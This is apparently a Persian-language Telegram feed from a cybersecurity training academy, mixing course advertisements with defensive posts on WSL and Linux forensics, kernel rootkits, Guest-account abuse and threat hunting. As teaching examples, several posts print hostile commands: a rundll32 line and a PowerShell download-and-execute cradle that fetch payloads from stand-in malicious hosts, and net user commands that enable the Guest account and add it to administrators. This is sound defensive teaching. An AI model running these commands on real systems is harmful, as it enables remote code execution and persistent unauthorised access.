آکادمی آموزش روزبه 📚

14 May 2025 10:13

ساعت ۱۲:۳۰فردا کلاس CISSPشروع می‌شود

آکادمی آموزش روزبه 📚

13 May 2025 17:38

چالش واسه تحلیلگر سطح ۱



فرض کنید در یک لاگ از SIEM متوجه الگوی زیر شده‌اید:


Parent Process: powershell.exe
Child Process: rundll32.exe
Command Line: rundll32.exe javascript​:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//malicious[.]domain/payload.sct").Run();


❓به‌نظر شما:

1. این تکنیک از چه نوع حمله‌ای استفاده می‌کنه؟

2. کدام دسته از تکنیک‌های MITRE ATT\&CK رو پوشش می‌ده؟
3. چطور می‌تونید این رفتار رو با SIEM یا EDR شناسایی کنید؟
4. چه روش‌هایی برای جلوگیری از اجرای چنین اسکریپت‌هایی پیشنهاد می‌کنید؟


#آکادمی_روزبه
مرکز تخصصی CISSP

آکادمی آموزش روزبه 📚

12 May 2025 20:40

نگاهی به فارنزیک در WSL

مقوله WSL (Windows Subsystem for Linux) یک محیط برای اجرای توزیع‌های لینوکس در ویندوز است که اخیراً به دلیل قابلیت‌ها و انعطاف‌پذیری آن، توجه هکرها و تحلیلگران امنیت سایبری را به خود جلب کرده است.
در زمینه فارنزیک، WSL به عنوان یک چالش جدید دیده می‌شود چون بسیاری از ابزارهای فارنزیک سنتی نمی‌توانند به طور مؤثر داده‌های WSL را تحلیل کنند.
در ادامه به جنبه‌های مهم فارنزیک در WSL نگاهی می‌اندازم:

1. چرا فارنزیک در WSL اهمیت پیدا کرده است؟

مخفی بودن فعالیت‌ها: استفاده از محیط لینوکس در ویندوز به مهاجمان اجازه می‌دهد تا فعالیت‌های مخرب خود را دور از نظارت ابزارهای سنتی امنیتی ویندوز اجرا کنند.
بازیابی داده‌ها: فضاهای ذخیره‌سازی و فایل‌سیستم WSL (مانند استانداردهای لینوکس مثل Ext4) با ابزارهای فارنزیک ویندوز سازگار نیستند و این باعث کاهش قابلیت شناسایی می‌شود.
ترکیب سیستم‌ها: مهاجمان می‌توانند از قابلیت‌های ویندوز و لینوکس به طور ترکیبی استفاده کنند تا قابلیت‌های مخرب را افزایش دهند.

2. موضوع Artifactهای کلیدی در WSL

در فارنزیک، Artifact به هر داده یا منطقی گفته می‌شود که بتواند اطلاعات مفیدی درباره یک فعالیت مخرب یا مجرمانه ارائه دهد. در WSL، Artifactها شامل موارد زیر هستند:

الف) فایل‌های سیستمی توزیع لینوکس
(WSL Filesystem):

مسیر ذخیره‌سازی فایل‌ها در WSL:
نسخه 1: مسیر ذخیره‌سازی در ویندوز (مانند C:\Users\Username\AppData\Local\lxss).
نسخه 2: WSL از یک ماشین مجازی سبک با فایل‌سیستم Ext4 استفاده می‌کند. فایل‌های لینوکس در یک فایل vhd قرار می‌گیرند (مانند C:\Users\Username\AppData\Local\Packages\...).
مهاجمان ممکن است فایل‌های اجرایی مخرب (مثل اسکریپت‌های Bash یا فایل‌های رمزگذاری‌شده) را در این مسیرها ذخیره کنند.

ب)فایل‌های Log و تنظیمات:

فایل‌های کانفیگ: فایل‌هایی مثل wsl.conf یا فایل‌های محیطی سیستم لینوکس.
سشن‌ها و لاگ‌ها: مسیرهای ذخیره لاگ‌ها و فعالیت‌های کاربر در محیط لینوکس یا ویندوز که شامل تاریخچه ترمینال لینوکس (مانند .bash_history) می‌شود.
پروسه‌ها: پروسه‌های فعال در محیط WSL که در Task Manager ویندوز قابل مشاهده نیستند.

ج) شبکه و C2 ارتباطات:

این WSL می‌تواند با شبکه ویندوز به اشتراک بپردازد، که مهاجمان از آن برای ارتباط با سرورهای C2 استفاده می‌کنند.

د) ماشین مجازی:

چون WSL2 از ماشین مجازی بهره می‌گیرد، بررسی حافظه (Memory Dump) آن می‌تواند اطلاعات ارزشمندی درباره فعالیت‌های مخرب به دست دهد.



#آکادمی_روزبه
مرکز تخصصی CISSP

پی نوشت :
مقوله WSL 1 در واقع یک لایه سازگاری است که syscall های لینوکس را مستقیماً به syscall های ویندوز ترجمه می‌کند. در این معماری، فایل‌های لینوکس مستقیماً در فایل‌سیستم ویندوز (معمولاً در پوشه AppData\Local\lxss) ذخیره می‌شوند.

اما WSL 2 از یک ماشین مجازی سبک (lightweight utility virtual machine) استفاده می‌کند که یک هسته لینوکس واقعی را اجرا می‌کند. در این معماری، فایل‌های لینوکس در یک فایل دیسک مجازی (VHD) با فایل‌سیستم Ext4 ذخیره می‌شوند. به همین دلیل، تحلیل حافظه (Memory Dump) ماشین مجازی WSL 2 می‌تواند اطلاعات مربوط به پروسه‌ها، حافظه استفاده شده توسط هسته لینوکس و سایر فعالیت‌های درون محیط WSL 2 را فراهم کند، که در WSL 1 به این شکل قابل دسترسی نیست.

آکادمی آموزش روزبه 📚

12 May 2025 05:40

راهنمایی برای هانت

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

11 May 2025 20:27

گزارش فنی بخوانیم

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

11 May 2025 06:53

پنج شنبه شروع کلاس CISSP

ساعت ۱۲:۳۰ تا ۱۶:۳۰

آنلاین در سراسر ایران

آکادمی آموزش روزبه 📚

10 May 2025 17:13

#تجربه

برای چندمین بار:

لاگ ریبوت های سرور و فایروال رو جدی بگیرید !!

مورد هست که به راحتی با همین ها نفوذ کشف شد

تمام

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

09 May 2025 20:27

چیت شیت اسپلانک

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

08 May 2025 18:18

ابزاری جالب که امروز بهتون معرفی میکنم


ابزار EventLog Compendium
این ابزار به تحلیلگران امنیت، مدیران سیستم، و شکارچیان تهدید (Threat Hunters) کمک می‌کند تا اطلاعات دقیق و مستند‌شده درباره کدهای رویداد (Event IDs) موجود در لاگ سیستم‌های ویندوز به دست آورند و تصمیمات خود را سریع‌تر و دقیق‌تر انجام دهند.


ابزار بسیار جالبی برای SOC و هانت هست

همین الان به ۵ مورد استفاده اش فکر کنید
#آکادمی_روزبه
مرکز تخصصی CISSP

https://eventlog-compendium.streamlit.app/Sysmon_Configuration_Builder

آکادمی آموزش روزبه 📚

07 May 2025 13:49

یک سال منتورینگ شما توسط استاد روزبه برو روی پکیج دوره CISSP میباشد

از تخفیف 20 درصدی شرکت هامون استفاده کنید و یکسال منتورینگ داشته باشید.

واتس اپ 09902857290
www.haumoun.com
www.roozbeh.academy

آکادمی آموزش روزبه 📚

06 May 2025 21:19

مهمان ناخوانده‌ای در سازمان؛ تحلیلی بر سوءاستفاده مهاجمان از حساب Guest در ویندوز

✍️روزبه نوروزی

در یک محیط ویندوز که ظاهراً هیچ نشانه‌ای از آلودگی نداشت، موردی مشاهده شد که در نگاه اول بسیار ساده به نظر می‌رسید، اما در نهایت به کشف یک تکنیک پنهان و مؤثر از سوی مهاجمان منجر شد. دراینجا شناسایی استفاده‌ی مخفیانه از حساب کاربری Guest در ویندوز که مهاجمان از آن برای دستیابی مجدد و پایدار به سیستم سوءاستفاده کرده بودند رو میبینیم


مدت‌هاست که حساب Guest در ویندوز دیگر کاربرد چندانی ندارد و در بسیاری از سازمان‌ها به دلایل امنیتی غیرفعال باقی مانده است. اما همین موضوع باعث شده مهاجمان سایبری از این غفلت استفاده کرده و با فعال‌سازی مجدد این حساب، بدون جلب توجه تیم‌های امنیتی، در شبکه باقی بمانند.

شناسایی اولیه

در لاگ‌، رویداد امنیتی شماره 4722 دیده شد که نشان از فعال‌سازی یک حساب کاربری داشت. با بررسی بیشتر مشخص شد این حساب، همان Guest بوده که مدت‌ها غیرفعال بود. در ادامه، دستوراتی در لاگ آمده است


net user Guest /active:yes
net localgroup administrators Guest /add
net localgroup Remote Desktop Users Guest /add


این مهمه ، زیرا به‌نظر می‌رسه مهاجم از این حساب برای دور زدن سیستم‌های هشداردهنده و آنتی‌ویروس استفاده کرده باشد.

تحلیل فنی

مهاجم با فعال‌سازی حساب Guest، رمز عبور جدیدی برای آن تعریف کرده و آن را به گروه‌های Administrators و Remote Desktop Users اضافه کرده بود. این کار به او امکان می‌داد از طریق RDP به سیستم دسترسی پیدا کند، و چون این دسترسی با یک حساب شناخته‌شده اما به ظاهر سیستمی انجام می‌شد، در بسیاری از سیستم‌های نظارتی ردگیری نمی‌شد.

جالب‌تر آنکه مهاجم با استفاده از ابزارهایی مانند attrib.exe فایل‌های خاصی را hidden و system کرده بود تا اسکریپت‌های اجرایی خود را از دید کاربران مخفی کند. همچنین با wmic برخی پایداری‌ها برای اجرای مجدد پس از ری‌استارت سیستم اعمال کرده بود.

نشانه‌ها و ردپاها

* فعال شدن حساب Guest پس از مدت طولانی
* رویدادهای امنیتی 4722 (فعال‌سازی کاربر)، 4728 (افزودن به گروه Admins) و 4776 (استفاده از حساب برای لاگین)
* ارتباطات RDP مشکوک در ساعات غیر اداری
* فایل‌های hidden در مسیرهایی خاص


#آکادمی_روزبه
مرکز تخصصی CISSP
20 درصد تخفیف با سرمایه گذاری شرکت هامون

آکادمی آموزش روزبه 📚

06 May 2025 07:52

مفهوم IRP در کرنل برای تحلیلگر بدافزار


واقعاً دانستن مفهوم IRP برای یک تحلیلگر بدافزار ضروری است، مخصوصاً اگر با Rootkitها یا درایورهای مخرب در فضای کرنل سروکار داشته باشیم( از گروه کتاب Evasive Malware کانال آکادمی روزبه )

در ادامه به‌صورت دقیق و کاربردی توضیح می‌دهم چرا یک تحلیلگر بدافزار باید IRP را بشناسد:
1. بررسی Rootkitهای سطح پایین (Kernel-Mode Rootkits)

بسیاری از rootkitها با نصب درایور در کرنل، IRPها را Hook می‌کنند تا فعالیت‌های خاصی را پنهان کنند (مثلاً فایل، پردازش، یا پورت مخفی). اگر IRP را نشناسید، نمی‌فهمید این hook چطوری عمل می‌کنه یا چطور باید تشخیصش بدید.

مثال:
یک Rootkit ممکنه IRP_MJ_DIRECTORY_CONTROL رو hook کنه تا فایل خودش رو در لیست دایرکتوری‌ها پنهان کنه.

2. درک رفتار بدافزارهایی که درایور نصب می‌کنند

بسیاری از بدافزارهای پیشرفته (APT یا باج‌افزارهای پیچیده) درایورهای خاص خودشون رو نصب می‌کنن. تحلیلگر باید بدونه این درایورها چطور از IRP استفاده می‌کنن یا چطور IRPها رو تغییر می‌دن.

3. درک لاگ‌های تولیدشده در تحلیل داینامیک

ابزارهایی مثل Sysinternals یا Kernel Debuggerها گاهی اطلاعاتی مثل نوع IRP و مسیر عبور آن را نشان می‌دهند. بدون دانش IRP نمی‌تونید این لاگ‌ها رو تفسیر کنید.

4. تحلیل حافظه (Memory Forensics)

در تحلیل حافظه (مثلاً با Volatility یا Rekall)، اگر درایورهای مشکوک و Hookهای غیرعادی روی IRP Function Tableها (مثل DriverObject->MajorFunction[]) پیدا کنید، این یعنی احتمال وجود بدافزار کرنلی. بدون درک IRP نمی‌تونید بفهمید این مقادیر برای چی هستند.

5. شناسایی تکنیک‌های ضدتحلیل (Anti-Forensics)

بدافزارهایی وجود دارن که IRPهای خاصی رو کنترل می‌کنن تا ابزارهای امنیتی یا تحلیل را فریب بدن (مثلاً مانع از دسترسی ابزار به فایل‌های بدافزار می‌شوند).


#آکادمی_روزبه

آکادمی آموزش روزبه 📚

05 May 2025 07:29

چالش‌های خاص تحلیل جرم‌شناسی و فارنزیک در لینوکس

در حالی که لینوکس مزایایی مانند متن‌باز بودن و انعطاف‌پذیری بالا دارد، اما این ویژگی‌ها می‌توانند تحلیل جرم‌شناسی را پیچیده‌تر کنند. در مقابل، ویندوز با ساختارهای مرکزی‌تر و ابزارهای گرافیکی ممکن است فرآیند تحلیل را ساده‌تر کند. اما در نهایت، میزان دشواری تحلیل جرم‌شناسی به تجربه و دانش تحلیل‌گر در هر سیستم‌عامل بستگی دارد.

چرا ممکن است فارنزیک در لینوکس سخت باشد؟

✅ ۱. تنوع فایل‌سیستم‌ها در لینوکس

در لینوکس، فایل‌سیستم‌های متنوعی مانند Ext3، Ext4، XFS، Btrfs و ZFS مورد استفاده قرار می‌گیرند. این تنوع می‌تواند تحلیل جرم‌شناسی را پیچیده‌تر کند، زیرا هر فایل‌سیستم ویژگی‌ها و ساختارهای خاص خود را دارد. به‌عنوان مثال، فایل‌سیستم XFS به دلیل ویژگی‌هایی مانند تخصیص تأخیری و پشتیبانی محدود از ابزارهای تحلیل، می‌تواند بازیابی داده‌ها را دشوارتر کند.


✅ ۲. پیچیدگی در مدیریت حجم‌های منطقی (LVM)

بسیاری از سیستم‌های لینوکسی از LVM برای مدیریت دیسک‌ها استفاده می‌کنند. در حالی که این ابزار انعطاف‌پذیری بالایی در مدیریت ذخیره‌سازی فراهم می‌کند، اما در تحلیل جرم‌شناسی می‌تواند چالش‌برانگیز باشد، زیرا برخی از ابزارهای تحلیل قادر به تفسیر ساختارهای LVM نیستند.


✅ ۳. عدم وجود رجیستری مرکزی

برخلاف ویندوز که از رجیستری مرکزی برای ذخیره تنظیمات سیستم و برنامه‌ها استفاده می‌کند، لینوکس فاقد چنین ساختاری است. تنظیمات در لینوکس معمولاً در فایل‌های متنی پراکنده در مسیرهایی مانند /etc ذخیره می‌شوند. این پراکندگی می‌تواند فرآیند جمع‌آوری و تحلیل داده‌ها را پیچیده‌تر کند.


✅ ۴. نیاز به تسلط بر خط فرمان

بسیاری از ابزارهای تحلیل جرم‌شناسی در لینوکس مبتنی بر خط فرمان هستند، مانند dd، grep و Autopsy. این موضوع می‌تواند برای افرادی که به محیط‌های گرافیکی عادت دارند، چالش‌برانگیز باشد. در مقابل، ویندوز ابزارهای گرافیکی متعددی برای تحلیل جرم‌شناسی فراهم می‌کند.


✅ ۵. تنوع توزیع‌های لینوکس

وجود توزیع‌های مختلف لینوکس با ساختارها و پیکربندی‌های متفاوت می‌تواند تحلیل جرم‌شناسی را پیچیده‌تر کند. هر توزیع ممکن است از ابزارها و مسیرهای متفاوتی برای ذخیره لاگ‌ها و تنظیمات استفاده کند.


✅ ۶. ابزارهای تحلیل جرم‌شناسی

در حالی که ویندوز ابزارهای تجاری قدرتمندی مانند EnCase و FTK دارد، لینوکس بیشتر به ابزارهای متن‌باز مانند The Sleuth Kit و Autopsy متکی است. اگرچه این ابزارها قدرتمند هستند، اما ممکن است نیاز به دانش فنی بیشتری برای استفاده مؤثر از آن‌ها باشد.

✅ ۷. ساختار مجوزها و مالکیت فایل‌ها

لینوکس از مدل مجوزهای مبتنی بر مالک، گروه و دیگران استفاده می‌کند، که می‌تواند در تحلیل دسترسی‌ها و تغییرات فایل‌ها پیچیدگی‌هایی ایجاد کند. در مقابل، ویندوز از لیست‌های کنترل دسترسی (ACL) استفاده می‌کند که ساختار متفاوتی دارد.


#آکادمی_روزبه
مرکز تخصصی CISSP
Www.Roozbeh.academy

آکادمی آموزش روزبه 📚

04 May 2025 13:33

❌️پایان تخفیف 30 درصد

✅️شروع تخفیف 20 درصد

فقط تا ۲۰ اردیبهشت ؛ مخصوص اشخاص ساکن در ایران


مرکز آموزش هامون
آکادمی روزبه

آکادمی آموزش روزبه 📚

04 May 2025 06:57

بررسی حمله روز

مقاله‌ای زیر درباره‌ی یک حمله پیشرفته از گروه APT موسوم به TheWizards است که از تکنیکی به نام SLAAC spoofing برای اجرای حملات Adversary-in-the-Middle (AitM) استفاده می‌کند.


انجام SLAAC Spoofing و حمله Adversary-in-the-Middle:

1. موضوع SLAAC چیست
این SLAAC (Stateless Address Autoconfiguration) یکی از روش‌های خودکار برای گرفتن آدرس IPv6 توسط کلاینت‌هاست. در این روش، کلاینت‌ها با گوش دادن به پیام‌های Router Advertisement (RA) از روترها، آدرس خود را تنظیم می‌کنند.

2. این SLAAC Spoofing چگونه کار می‌کند؟
مهاجم یک پیام جعلی RA را روی شبکه لوکال ارسال می‌کند که وانمود می‌کند از طرف یک روتر قانونی است. این پیام چه می‌گوید:

* به کلاینت‌ها می‌گوید برای ارسال ترافیک از یک دروازه (Gateway) خاص استفاده کنند.
* باعث می‌شود ترافیک مقصدهای خارجی از طریق دستگاه مهاجم عبور کند.

3. نتیجه این حمله چیست؟

* مهاجم بین کلاینت و اینترنت قرار می‌گیرد (Adversary-in-the-Middle).
* می‌تواند ترافیک را شنود (sniff)، دستکاری (modify) یا تغییر مسیر دهد.
* در برخی موارد، حتی می‌تواند گواهی جعلی ارائه دهد و SSL/TLS را دور بزند (در صورت نبود حفاظت مناسب).

4. مزیت این حمله برای مهاجم:

* بی‌نیاز از اکسپلویت یا بدافزار است؛ کاملاً مبتنی بر ضعف پیکربندی یا اعتماد به IPv6 است.
* در بسیاری از شبکه‌ها، IPv6 به‌صورت پیش‌فرض فعال است اما مدیریت یا مانیتور نمی‌شود.


در این مقاله، ESETبه این موضوع اشاره دارد که گروه TheWizards از این تکنیک برای نفوذ به شبکه‌های سازمانی استفاده کرده‌اند و با قرار گرفتن در مسیر ترافیک، به ارتباطات داخلی دست یافته‌اند.


#آکادمی_روزبه
https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/?ref=t.me/onhex_ir

آکادمی آموزش روزبه 📚

13 May 2025 20:12

سایت Tool Analysis Result Sheet متعلق به JPCERT/CC (مرکز هماهنگ‌سازی تیم پاسخ به حوادث ژاپن) است و برای ارائه تحلیل ابزارهای مخرب و فعالیت‌های مشکوک طراحی شده است.
این پلتفرم به تحلیل‌کنندگان امنیت سایبری و فارنزیک کمک می‌کند تا اطلاعات دقیق، دستورالعمل‌ها، و نتایج تحلیل ابزارها یا فایل‌های مخرب خاص را در یک قالب ساختاریافته دریافت کنند.

#آکادمی_روزبه
مرکز تخصصی CISSP

https://jpcertcc.github.io/ToolAnalysisResultSheet/

آکادمی آموزش روزبه 📚

12 May 2025 20:42

✅دوستانی که در کلاس CISSP ثبت نام کرده اند به همان شماره ثبت نامی ؛ تا فردا ظهر اطلاعات برای حضور در کلاس ارسال میگردد

💠ضمنا لینک گروه تلگرامی هم ارسال میشود
در این گروه موارد زیر مطرح میگردد:

-بحث و تبادل نظر در خصوص مطالب درسی
- نکات آزمون
-رفع اشکال
- تبادل منابع
- تست زنی

لذا بخشی از کلاس عملا در گروه میباشد پس شرکت و مطالعه مطالب گروه لازم است.

آکادمی آموزش روزبه 📚

12 May 2025 06:40

🍀خدمات من

خدمات و سرویس های پروژه ای و مشاوره ای من
همچنین آموزش هایم
درقالب شرکت پیشگامان فناوری اطلاعات هامون به شما ارائه میگردد.

https://haumoun.com

تلفن تماس
02188105008

برای ایرانی امن ؛ با من در تماس باشید



#آکادمی_روزبه
مرکز تماس آکادمی روزبه : واتس اپ 09902857290

آکادمی آموزش روزبه 📚

11 May 2025 21:17

نکاتی از پاورشل برای تیم های قرمز و آبی و بنفش

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

11 May 2025 13:56

برخی دوستان امکان دانلود CIS رو نداشتن

بعنوان یه راهکار جمع و جور واسه نقشه راه سازمان توصیه اش میکنم

اما اگر میخواین یه معمار و طراح اصولی واسه امنیت بشین راهکارش CISSP هست

آکادمی آموزش روزبه 📚

11 May 2025 06:01

کامپایل داینامیک

از منظر تحلیلگر بدافزار این موضوع به معنای تولید و اجرای کد در زمان اجرا است. این روش توسط بسیاری از بدافزارها به منظور مخفی کردن رفتار واقعی‌شان یا جلوگیری از شناسایی شدن توسط ابزارهای امنیتی استفاده می‌شود.

کامپایل داینامیک به بدافزار اجازه می‌دهد که در لحظه اجرا، کدی جدید تولید کند، بخش‌های مخرب را دریافت کرده و اجرا کند، و خود را از تحلیل استاتیک یا سنتی دور نگه دارد.


کامپایل داینامیک چگونه در بدافزارها استفاده می‌شود؟

1. تولید کد مخرب در زمان اجرا

در این روش، بدافزار از کدی که در فایل اصلی نوشته شده است، استفاده نمی‌کند. در عوض، کد مخرب خود را داینامیک تولید می‌کند یا از سرور Command & Control (C2) دریافت می‌کند. این کار معمولاً باعث می‌شود تحلیلگر نتواند رفتار بدافزار را به‌طور کامل در بررسی اولیه شناسایی کند.

2. اجرا در حافظه (Fileless Execution)
کامپایل داینامیک اغلب همراه با تکنیک‌های اجرای در حافظه (Fileless) دیده می‌شود. این یعنی بدافزار فایل اجرایی یا کدی را روی دیسک ذخیره نمی‌کند و مراحل مخرب خود را مستقیم در RAM اجرا می‌کند. این روش شناسایی بدافزار را برای ابزارهای امنیتی مبتنی بر تحلیل فایل دشوارتر می‌کند.

3. مبهم‌سازی و تاخیر در تحلیل

کامپایل داینامیک یکی از تکنیک‌های رایج مبهم‌سازی (Obfuscation) محسوب می‌شود. بسیاری از ابزارهای تحلیل بدافزار نمی‌توانند کدی را که در زمان اجرا تولید می‌شود، به راحتی بررسی کنند. این مسئله باعث سخت‌تر شدن دیباگ و تحلیل رفتار بدافزار می‌شود.


مثال‌های رایج از کامپایل داینامیک در بدافزارها

PowerShell Cradle
بدافزارهای مبتنی بر PowerShell معمولاً از تکنیک‌های کامپایل داینامیک استفاده می‌کنند تا کد مخرب را از سرور بارگذاری کرده و مستقیم اجرا کنند. به عنوان مثال:

IEX (New-Object Net.WebClient).DownloadString('http://malicioussite.com/payload.ps1');


- این کد در زمان اجرا، اسکریپت مخرب را از وب‌سایت دریافت کرده، و آن را داینامیک کامپایل و اجرا می‌کند.

Dynamic DLL Loading

برخی بدافزارها به‌جای اینکه همه کد مخرب را در فایل اصلی ذخیره کنند، فقط هسته بدافزار را اجرا کرده و سپس DLLهای مخربرا با کامپایل داینامیک بارگذاری می‌کنند. این کار معمولاً از طریق API‌های ویندوز مثل LoadLibrary انجام می‌شود.

JavaScript Eval

تکنیک‌های کامپایل داینامیک در JavaScript نیز به وفور استفاده می‌شود. بدافزار ممکن است از دستور eval() استفاده کند تا کدی که به صورت داینامیک تولید یا دریافت شده است را اجرا کند.

javascript
let dynamicCode = "alert('Executed malicious code!')";
eval(dynamicCode); // اجرای کد مخرب

تحلیل کامپایل داینامیک در بدافزار

چالش‌ها
1. کد دینامیک و غیرقابل پیش‌بینی:چون کد واقعی در زمان اجرا تولید می‌شود، تحلیلگر نمی‌تواند به طور مستقیم در فایل اولیه رفتار بدافزار را شناسایی کند.
2. اجرای در حافظه: ممکن است بدافزار فایل یا ردپای مشخصی روی دیسک نداشته باشد و فقط در حافظه فعالیت کند.
3. مبهم‌سازی کد: کد داینامیک معمولاً با تکنیک‌های مبهم‌سازی همراه است تا باز کردن و خواندن آن پیچیده‌تر شود.

#آکادمی_روزبه
مرکز تخصصی CISSP

آکادمی آموزش روزبه 📚

09 May 2025 21:38

❤️شرکت هامون ۴ م تومان از هزینه دوره CISSP را به جای شما پرداخت میکند.

🔴شنبه آخرین مهلت


من یکسال پس از دوره CISSP همراه شما هستم تا با برنامه ریزی ؛ موفقیت شما را جشن بگیریم 💐

واتس اپ 09902857290

آکادمی آموزش روزبه 📚

08 May 2025 21:07

صفحه ای که می‌تواند دوست شما باشد!!

این بلو اسکرین روی اعصاب خیلی از ما هست که رخ دادنش میتونه دلایل زیادی داشته باشه. اما میدونین یکی از دلایل مهمش حفاظت از ما است ؟

بله ؛ این صفحه روممکنه در وقتی ملاحظه کنید که بدافزار و هکری سعی در دورزدن کنترل های امنیتی ویندوز داشته .
مثلا ویندوز داشته توسط پچ گارد امنیت کرنل رو چک میکرده و با مشاهده مشکلی؛ ویندوز رو در این حالت برده تا هم لاگ برداره هم ویندوز رو به حالت شروع از نو و چک کردن همه جوانب ببره .

پس خیلی از این صفحه دلخور نباشید 😊.

#آکادمی_روزبه
آموزش تخصصی امنیت

آکادمی آموزش روزبه 📚

08 May 2025 18:04

کال بک در کرنل و مثال واقعی یک روت کیت
از کتاب Evasive Malware گروه آموزشی وابسته به تلگرام آکادمی روزبه


مقوله Callback در کرنل چیست؟
مقوله Callbackها توسط سیستم‌عامل برای اطلاع‌رسانی رویدادهای خاص به ماژول‌های کرنل (مانند درایورها) استفاده می‌شوند. مثلاً اگر یک فرآیند جدید ایجاد شود، سیستم‌عامل از طریق PsSetCreateProcessNotifyRoutine یک اعلان به درایورهای ثبت‌شده ارسال می‌کند تا آن‌ها بتوانند عملیاتی مانند ثبت یا پردازش را انجام دهند.

نحوه سوءاستفاده از Callback چیست؟
روت‌کیت‌ها، مانند Necurs، از این قابلیت برای نفوذ و کنترل سیستم سوءاستفاده می‌کنند. آن‌ها با ثبت Callbackهای مخرب در کرنل، می‌توانند:
- رویدادهای مهم سیستم (مانند ایجاد فرآیند یا تغییر در فایل‌ها) را رهگیری کنند.
- اقدامات مخرب انجام دهند، مانند پنهان‌سازی فرآیند یا فایل‌ها، مسدود کردن ابزارهای امنیتی، و کنترل فعالیت شبکه.

روت‌کیت Necurs: معرفی و هدف

- سال ظهور:Necurs در سال 2012 شناسایی شد و به یکی از پیچیده‌ترین روت‌کیت‌های زمان خود تبدیل شد.
- فعالیت: Necurs به‌عنوان یک روت‌کیت و بات نت عمل می‌کرد و علاوه بر مخفی‌کردن خود، برای توزیع بدافزارهایی مانند Locky و GameOver Zeus مورد استفاده قرار می‌گرفت.
- سال نابودی: در سال 2020، مایکروسافت و تیم‌های امنیتی زیرساخت‌های Necurs را مختل و سرورهای فرمان و کنترل (C2) آن را از بین بردند.



روت کیت Necurs و سوءاستفاده از Callbackها
روت‌کیت Necurs برای تثبیت موقعیت، محقق ساختن عملیات مخرب و پنهان ماندن از ابزارهای امنیتی، از Callbackهای کرنل به‌صورت گسترده سوءاستفاده می‌کرد.

روش‌های سوءاستفاده Necurs از Callbackها:
1. پنهان‌سازی فرآیندها:
-این Necurs با استفاده ازPsSetCreateProcessNotifyRoutin ، فرآیندهای خود و بدافزارهای وابسته را از لیست فرآیندهای قابل مشاهده پنهان می‌کرد.
- هر بار که یک فرآیند جدید در سیستم راه‌اندازی می‌شد، Necurs بررسی می‌کرد آیا باید این فرآیند را پنهان کند یا به اقدامات مخرب خاصی بپردازد.

2. کنترل سیستم فایل:
- با سوءاستفاده از Callbackهای مرتبط با سیستم فایل (مانند فیلترهای I/O)، Necurs فایل‌های مخرب خود را پنهان می‌کرد یا دسترسی به آن‌ها را مسدود می‌کرد.
- این تکنیک باعث می‌شد ابزارهای امنیتی نتوانند فایل‌های Necurs را شناسایی یا حذف کنند.

3. اختلال در ابزارهای امنیتی:
- روت کیت Necurs ابزارهای ضدبدافزار یا تحلیل بدافزار را از طریق مانیتور کردن آن‌ها شناسایی کرده و تلاش می‌کرد اجرای آن‌ها را مختل کند.
- این روت‌کیت حتی می‌توانست کدی را به‌طور مخرب به فرآیندهای امنیتی تزریق کند یا ساختار داده‌های آن‌ها را روی کرنل تغییر دهد.

4. نظارت و مداخله در فعالیت شبکه:
- این Necurs از Callbackهای سطح شبکه (TDI یا سایر فیلترهای شبکه) برای مخفی کردن ارتباط با سرورهای C2 استفاده می‌کرد.
- این قابلیت باعث شد ترافیک مخرب آن، مانند ارسال اسپم یا دستورات بدافزاری، از دید ابزارهای شناسایی شبکه پنهان بماند.

5. ماندگاری و مقاومت:
- با استفاده از Callbackها، Necurs هرگونه تلاش برای شناسایی و حذف را در همان لحظه شناسایی کرده و با مختل کردن عملیات ضدبدافزارها از حذف خود جلوگیری می‌کرد.


**چه روت کیتهایی الان فعال هستند و ما نمی‌دانیم؟

#آکادمی_روزبه
مرکز تخصصی CISSP

آکادمی آموزش روزبه 📚

07 May 2025 07:44

ماشین‌لرنینگ و مدل‌های ARIMA و LSTM در پیش‌بینی رفتارهای عادی و تشخیص نقاط غیرعادی در داده‌ها برای هانت سایبری

✍️روزبه نوروزی

مقدمه
در عصر دیجیتال، پیچیدگی افزایش‌یافته حملات سایبری و الگوهای متغیر رفتار مهاجمان، سازمان‌ها را مجبور کرده است تا به تکنولوژی‌های پیشرفته‌ای برای پیش‌بینی و شناسایی تهدیدات سایبری مراجعه کنند. استفاده از ماشین‌لرنینگ و مدل‌های سری زمانی مانند (AutoRegressive Integrated Moving Average) و LSTM(Long Short-Term Memory) به عنوان یکی از روش‌های کلیدی برای تحلیل داده و پیش‌بینی رفتارهای غیرعادی، توانایی سازمان‌ها در شناسایی تهدیدات سایبری را به شدت بهبود داده است.

در اینجا به مرور کاربرد این مدل‌ها در سیستم‌های سایبری و اهمیت آن‌ها در شناسایی تهدیدات آینده‌نگر و نقاط آسیب‌پذیر می‌پردازم.


کاربرد مدل‌های سری زمانی در هانت سایبری

1. مدل ARIMA در تشخیص الگوهای حملات
مدل ARIMA عمدتاً برای پیش‌بینی الگوهای زمانی با داده‌های تاریخی به کار می‌رود و قابلیت تحلیل روندهای گذشته برای استخراج پیش‌بینی‌های آینده را دارد. در هانت سایبری:
- سازمان‌ها از ARIMA برای پیش‌بینی تعداد درخواست‌های مشکوک در شبکه طی دوره‌های خاص زمانی استفاده می‌کنند.
- به عنوان مثال، تحلیل وقایع گذشته مانند تعداد تلاش‌های ناکام برای ورود به سیستم باعث می‌شود تا نقاط اوج (Spikes) آینده که ممکن است نشانگر حملات Brute Force باشند، شناسایی شود.

2. مدل LSTM در شناسایی نقاط غیرعادی و حملات پیچیده
مدل‌های LSTM، یکی از شکل بافته‌ترین رویکردهای یادگیری عمیق، برای تحلیل داده‌هایی با وابستگی طولانی‌مدت در سری زمانی مناسب هستند. این مدل‌ها در هانت سایبری به‌طور خاص برای شناسایی الگوهای پیچیده‌تر به کار می‌روند:
- مدل LSTM قادر به یادگیری توالی‌هایی است که رفتار مهاجم طی بازه‌های زمانی متفاوت را نشان می‌دهد.
- به عنوان مثال، ممکن است دسترسی‌های غیرمعمول به منابع حساس طی شب یا خارج از ساعات کاری با استفاده از LSTM کشف شوند. این نقاط غیرعادی می‌توانند نشان‌دهنده حرکت‌های جانبی مهاجم داخل شبکه باشند.

مثال عملی:
